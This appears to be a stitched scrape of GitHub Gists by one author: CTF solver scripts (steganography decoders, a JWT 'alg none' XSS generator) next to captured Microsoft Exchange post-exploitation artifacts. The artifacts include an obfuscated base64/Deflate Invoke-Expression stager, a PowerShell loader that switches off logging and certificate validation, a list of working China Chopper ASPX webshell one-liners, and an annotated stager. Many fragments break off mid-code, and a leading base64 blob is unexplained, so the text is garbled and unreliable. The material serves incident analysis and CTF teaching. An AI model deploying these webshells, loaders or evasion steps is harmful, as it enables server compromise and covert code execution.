
H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4HC4Jh0+9/3jg1p
qqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcO
jpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVcOKcWKtuOGiDtTIo/t9WPX
YaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeMs9ml9iqOL8/o4yhwfDcDa
FpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen2Lo8o3qC6HlGUxomN0i12
UVbvOZFH0B3yl6Bl0xRHwVIUQWwbr5FQi3JCJO53zAgD9FCB9qtKwnMlkBrSVJSgii/TNGMvJ+igyL8S
Jyu8CE9ZfIDt28nxybFf8WR1ZU6fEwVGR4v9GEFswjDO8F7uAydLnAluHBqnBUxrozRH4vIJWa7mIzxI
pZ8baFbSIBs/3K/nsLaYxNhbgk5Zz1roPIxabOPnxOwgH0eoU0TOBrsV94TXYEY+Qfs065XYAMIS+HID
eR1EUOBQhhyr9gu17gbTJ101x8RDqeJCqTKICqoo/hjMoRgCr0cm2gBMhznQr+YD41ElXbK8qLyzOQjx
beJkmcQNczhyrsTZyCHIkzglynC5peQ03g/57+GaOaHYdTJamVuKT0CWDttxlNE0d6F0kPzITpCLHcKw
# Choose which powershell.exe path to store in $b, based on the bitness of the
# current process. [IntPtr]::Size is 4 only when the process is 32-bit.
if ([IntPtr]::Size -eq 4) {
# 32-bit process: on 64-bit Windows the "sysnative" alias bypasses file-system
# redirection, so this path reaches the native (64-bit) powershell.exe.
$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'
}else{
# Otherwise powershell.exe is resolved by name.
$b='powershell.exe'
};
# NOTE(review): how $b is used is not visible in this excerpt. For triage, a
# process command line that contains \sysnative\WindowsPowerShell\ is worth
# looking for in process-creation telemetry.
JohnHammond / get_flag.py
Created September 2, 2018 02:04
Codefest CTF 2018 "Polyglot" get_flag Script
#!/usr/bin/env python
import re
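# Load secret.c as a list of lines with only the line terminator removed.
# The context manager closes the file even if reading raises.
with open('secret.c') as h:
    # rstrip('\n') instead of x[:-1]: a final line without a trailing newline
    # would otherwise lose a real character. The loop below turns each line's
    # tabs and spaces into bits, so a dropped whitespace character would
    # corrupt the decoded value.
    lines = [x.rstrip('\n') for x in h]
# Accumulator for the decoded pieces; filled by the loop that follows.
flag = []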
for line in lines:
num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0')
JohnHammond / get_flag.sh
Created September 13, 2018 17:11
IceCTF 'ilovebees' Get Flag script
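#!/bin/bash
# IceCTF 'ilovebees': rebuild the data hidden across the favicon frames and
# print the flag.
#
# For every frame favicon/00000.png .. favicon/00109.png the binary output of
# `exiftool -b` is taken, its first 156 bytes and last 84 bytes are dropped,
# and the remainder is appended to ./file. The last line of ./file's printable
# strings that mentions "IceCTF" (case-insensitive) is then printed.
#
# Requires: exiftool, GNU head (negative -c count), bash 4+ (zero-padded
# brace ranges).

out=file

# Start from an empty output file so that a re-run does not append to the
# data left behind by an earlier run.
: > "$out"

for i in {00000..00109}
do
    # dd prints its record counts on stderr. The original redirect sat only on
    # head, so that noise still reached the terminal; silence both stages.
    exiftool -b "favicon/$i.png" \
        | dd bs=1 skip=156 2>/dev/null \
        | head -c -84 2>/dev/null >> "$out"
done

strings "$out" | grep -i "IceCTF" --color=none | tail -n 1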
{
"Status": 0,
"TC": false,
"RD": true,
"RA": true,
"AD": false,
"CD": false,
"Question": [
{
"name": "dmarc.jqueryupdatejs.com.",
JohnHammond / attack.py
Created September 13, 2018 13:26
IceCTF "History of Computing" XSS Generator
#!/usr/bin/env python
# JWT header for an unsecured token: "alg": "none" declares that no signature
# is attached.
# NOTE(review): this is only accepted by a verifier that allows unsigned
# tokens; a service should pin the algorithm it expects and reject "none".
first_piece = '{ "typ": "JWT", "alg": "none" }'
# alert() proof-of-concept markup that is placed in the username claim.
our_xss = '<script>alert("xss")</script>'
# JWT payload as a JSON string. The username slot is filled with our_xss,
# whose double quotes are backslash-escaped so the JSON stays well-formed.
# The "flag" value is the placeholder text from the original script.
# NOTE(review): presumably the target renders the username claim without HTML
# encoding; context-aware output encoding of that field is the server-side
# fix. Confirm against the challenge source.
second_piece = '''
{ "username": "%s",
"flag": "IceCTF{hope you don\'t think this is a real flag}"}''' \
% our_xss.replace('"','\\"')
JohnHammond / p.esonine.com_stager01.ps1
Created March 6, 2021 05:18
Microsoft Exchange Post-Exploitation
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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
JohnHammond / dns_pulldown.ps1
Created August 26, 2020 18:51
DNS Pulldown
0..4|%{try
{
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
$u=[System.Text.Encoding]::UTF8;
sAl er Get-Random;
$l=[System.Net.WebRequest];
sAL no New-Object;
$g=[SysTEm.Net.SeRvICePoIntMAnaGEr];
$g::Expect100ConTINuE=0;
$g::ServerCertificateValidationCallback={1};
JohnHammond / china_chopper_source.csv
Created March 5, 2021 18:44
Microsoft Exchange Incident "China Chopper" ASPX Webshell source
# Occurrences, WebShell Source
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script>
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2
JohnHammond / p.estonine.com_stager02.ps1
Created March 6, 2021 05:21
Microsoft Exchange Post-Exploitation Artifacts 02
# Analyst annotations on a captured post-exploitation artifact; the code is
# left exactly as collected. Only the visible lines are described.

# Host identifier: getmac's CSV output with the header row skipped, the first
# data row kept, and its first column (named MAC here) expanded to a string.
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
try{
# Named system-wide mutex. The third constructor argument receives the
# "created new" result, which is the usual single-instance guard pattern.
# The mutex name is a host-based indicator to search for.
$name = 'Global\PSEXEC'
# $flase is not defined in the visible lines (presumably a typo of $false),
# so $exeflag starts as $null before the constructor writes to it.
$exeflag = $flase
New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag)
# The empty catch discards any error from creating the mutex.
}catch{}
# Current date as a two-digit year, month and day (yyMMdd).
$dt = Get-Date -Format 'yyMMdd'
# Marker/log file in the user's temp directory; another host-based indicator.
$path = "$env:temp\\ccc.log"
# Test-Path's boolean result is stored as the string "True" or "False".
# NOTE(review): how $mac, $dt and $flag are used is outside this excerpt.
[string]$flag = test-path $path